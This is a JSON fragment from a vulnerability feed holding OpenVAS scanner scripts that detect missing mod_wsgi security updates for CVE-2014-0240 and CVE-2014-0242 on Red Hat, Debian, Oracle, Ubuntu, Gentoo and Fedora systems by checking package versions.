"openvas", "title": "RedHat Update for mod_wsgi RHSA-2014:0788-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for mod_wsgi RHSA-2014:0788-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871194\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-07-01 23:19:30 +0530 (Tue, 01 Jul 2014)\");\n script_cve_id(\"CVE-2014-0240\", \"CVE-2014-0242\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for mod_wsgi RHSA-2014:0788-01\");\n\n\n script_tag(name:\"affected\", value:\"mod_wsgi on Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"insight\", value:\"The mod_wsgi adapter is an Apache module that provides a WSGI-compliant\ninterface for hosting Python-based web applications within Apache.\n\nIt was found that mod_wsgi did not properly drop privileges if the call to\nsetuid() failed. If mod_wsgi was set up to allow unprivileged users to run\nWSGI applications, a local user able to run a WSGI application could\npossibly use this flaw to escalate their privileges on the system.\n(CVE-2014-0240)\n\nNote: mod_wsgi is not intended to provide privilege separation for WSGI\napplications. Systems relying on mod_wsgi to limit or sandbox the\nprivileges of mod_wsgi applications should migrate to a different solution\nwith proper privilege separation.\n\nIt was discovered that mod_wsgi could leak memory of a hosted web\napplication via the 'Content-Type' header. A remote attacker could possibly\nuse this flaw to disclose limited portions of the web application's memory.\n(CVE-2014-0242)\n\nRed Hat would like to thank Graham Dumpleton for reporting these issues.\nUpstream acknowledges Robert Kisteleki as the original reporter of\nCVE-2014-0240, and Buck Golemon as the original reporter of CVE-2014-0242.\n\nAll mod_wsgi users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"RHSA\", value:\"2014:0788-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2014-June/msg00051.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mod_wsgi'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"mod_wsgi\", rpm:\"mod_wsgi~3.2~6.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_wsgi-debuginfo\", rpm:\"mod_wsgi-debuginfo~3.2~6.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-27T10:49:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "description": "Two security issues have been found in the Python WSGI adapter module\nfor Apache:\n\nCVE-2014-0240 \nRobert Kisteleki discovered a potential privilege escalation in\ndaemon mode. This is not exploitable with the kernel used in Debian\n7.0/wheezy.\n\nCVE-2014-0242 \nBuck Golemon discovered that incorrect memory handling could lead to\ninformation disclosure when processing Content-Type headers.", "modified": "2017-07-12T00:00:00", "published": "2014-05-27T00:00:00", "id": "OPENVAS:702937", "href": "http://plugins.openvas.org/nasl.php?oid=702937", "type": "openvas", "title": "Debian Security Advisory DSA 2937-1 (mod-wsgi - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2937.nasl 6692 2017-07-12 09:57:43Z teissa $\n# Auto-generated from advisory DSA 2937-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"mod-wsgi on Debian Linux\";\ntag_solution = \"For the oldstable distribution (squeeze), these problems have been fixed in\nversion 3.3-2+deb6u1.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 3.3-4+deb7u1.\n\nFor the testing distribution (jessie), these problems have been fixed in\nversion 3.5-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 3.5-1.\n\nWe recommend that you upgrade your mod-wsgi packages.\";\ntag_summary = \"Two security issues have been found in the Python WSGI adapter module\nfor Apache:\n\nCVE-2014-0240 \nRobert Kisteleki discovered a potential privilege escalation in\ndaemon mode. This is not exploitable with the kernel used in Debian\n7.0/wheezy.\n\nCVE-2014-0242 \nBuck Golemon discovered that incorrect memory handling could lead to\ninformation disclosure when processing Content-Type headers.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(702937);\n script_version(\"$Revision: 6692 $\");\n script_cve_id(\"CVE-2014-0240\", \"CVE-2014-0242\");\n script_name(\"Debian Security Advisory DSA 2937-1 (mod-wsgi - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-12 11:57:43 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-05-27 00:00:00 +0200 (Tue, 27 May 2014)\");\n script_tag(name: \"cvss_base\", value:\"10.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2937.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-wsgi\", ver:\"3.3-2+deb6u1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-wsgi-py3\", ver:\"3.3-2+deb6u1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-wsgi\", ver:\"3.3-4+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-wsgi-py3\", ver:\"3.3-4+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-wsgi\", ver:\"3.3-4+deb7u1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-wsgi-py3\", ver:\"3.3-4+deb7u1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-wsgi\", ver:\"3.3-4+deb7u1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-wsgi-py3\", ver:\"3.3-4+deb7u1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-wsgi\", ver:\"3.3-4+deb7u1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-wsgi-py3\", ver:\"3.3-4+deb7u1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:35:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "description": "Oracle Linux Local Security Checks ELSA-2014-0788", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123387", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123387", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-0788", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-0788.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123387\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:03:07 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-0788\");\n script_tag(name:\"insight\", value:\"ELSA-2014-0788 - mod_wsgi security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-0788\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-0788.html\");\n script_cve_id(\"CVE-2014-0240\", \"CVE-2014-0242\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"mod_wsgi\", rpm:\"mod_wsgi~3.2~6.el6_5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2014-06-02T00:00:00", "id": "OPENVAS:1361412562310841833", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841833", "type": "openvas", "title": "Ubuntu Update for mod-wsgi USN-2222-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2222_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for mod-wsgi USN-2222-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841833\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-06-02 15:02:08 +0530 (Mon, 02 Jun 2014)\");\n script_cve_id(\"CVE-2014-0240\", \"CVE-2014-0242\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for mod-wsgi USN-2222-1\");\n\n script_tag(name:\"affected\", value:\"mod-wsgi on Ubuntu 14.04 LTS,\n Ubuntu 13.10,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"insight\", value:\"Ró bert Kisteleki discovered mod_wsgi incorrectly checked\nsetuid return values. A malicious application could use this issue to cause a\nlocal privilege escalation when using daemon mode. (CVE-2014-0240)\n\nBuck Golemon discovered that mod_wsgi used memory that had been freed.\nA remote attacker could use this issue to read process memory via the\nContent-Type response header. This issue only affected Ubuntu 12.04 LTS.\n(CVE-2014-0242)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2222-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2222-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mod-wsgi'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|13\\.10)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-wsgi\", ver:\"3.4-4ubuntu2.1.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-wsgi-py3\", ver:\"3.4-4ubuntu2.1.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-wsgi\", ver:\"3.3-4ubuntu0.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-wsgi-py3\", ver:\"3.3-4ubuntu0.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU13.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-wsgi\", ver:\"3.4-4ubuntu2.1.13.10.1\", rls:\"UBUNTU13.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-wsgi-py3\", ver:\"3.4-4ubuntu2.1.13.10.1\", rls:\"UBUNTU13.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "description": "Gentoo Linux Local Security Checks GLSA 201412-21", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121307", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121307", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201412-21", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201412-21.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121307\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:13 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201412-21\");\n script_tag(name:\"insight\", value:\"Two vulnerabilities have been found in mod_wsgi:\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201412-21\");\n script_cve_id(\"CVE-2014-0240\", \"CVE-2014-0242\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201412-21\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-apache/mod_wsgi\", unaffected: make_list(\"ge 3.5\"), vulnerable: make_list(\"lt 3.5\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T19:58:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "description": "Two security issues have been found in the Python WSGI adapter module\nfor Apache:\n\nCVE-2014-0240\nRobert Kisteleki discovered a potential privilege escalation in\ndaemon mode. This is not exploitable with the kernel used in Debian\n7.0/wheezy.\n\nCVE-2014-0242\nBuck Golemon discovered that incorrect memory handling could lead to\ninformation disclosure when processing Content-Type headers.", "modified": "2019-12-20T00:00:00", "published": "2014-05-27T00:00:00", "id": "OPENVAS:1361412562310702937", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310702937", "type": "openvas", "title": "Debian Security Advisory DSA 2937-1 (mod-wsgi - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# Auto-generated from advisory DSA 2937-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.702937\");\n script_version(\"2019-12-20T08:10:23+0000\");\n script_cve_id(\"CVE-2014-0240\", \"CVE-2014-0242\");\n script_name(\"Debian Security Advisory DSA 2937-1 (mod-wsgi - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 08:10:23 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-05-27 00:00:00 +0200 (Tue, 27 May 2014)\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-2937.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(6|7)\");\n script_tag(name:\"affected\", value:\"mod-wsgi on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (squeeze), these problems have been fixed in\nversion 3.3-2+deb6u1.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 3.3-4+deb7u1.\n\nFor the testing distribution (jessie), these problems have been fixed in\nversion 3.5-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 3.5-1.\n\nWe recommend that you upgrade your mod-wsgi packages.\");\n script_tag(name:\"summary\", value:\"Two security issues have been found in the Python WSGI adapter module\nfor Apache:\n\nCVE-2014-0240\nRobert Kisteleki discovered a potential privilege escalation in\ndaemon mode. This is not exploitable with the kernel used in Debian\n7.0/wheezy.\n\nCVE-2014-0242\nBuck Golemon discovered that incorrect memory handling could lead to\ninformation disclosure when processing Content-Type headers.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libapache2-mod-wsgi\", ver:\"3.3-2+deb6u1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-wsgi-py3\", ver:\"3.3-2+deb6u1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-wsgi\", ver:\"3.3-4+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-wsgi-py3\", ver:\"3.3-4+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-06-23T00:00:00", "id": "OPENVAS:1361412562310867916", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867916", "type": "openvas", "title": "Fedora Update for mod_wsgi FEDORA-2014-6944", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mod_wsgi FEDORA-2014-6944\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867916\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-06-23 15:06:55 +0530 (Mon, 23 Jun 2014)\");\n script_cve_id(\"CVE-2014-0240\", \"CVE-2014-0242\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for mod_wsgi FEDORA-2014-6944\");\n script_tag(name:\"affected\", value:\"mod_wsgi on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-6944\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134424.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mod_wsgi'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mod_wsgi\", rpm:\"mod_wsgi~3.5~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], 